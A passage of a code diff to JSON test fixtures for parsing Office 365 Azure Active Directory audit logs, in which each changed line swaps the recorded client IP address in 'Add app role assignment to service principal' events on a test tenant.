@@ -14818,7 +14818,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -14848,9 +14848,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:30:06",
 "ExtendedProperties": [
 {
@@ -15084,7 +15084,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -15114,9 +15114,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:30:06",
 "ExtendedProperties": [
 {
@@ -15350,7 +15350,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"V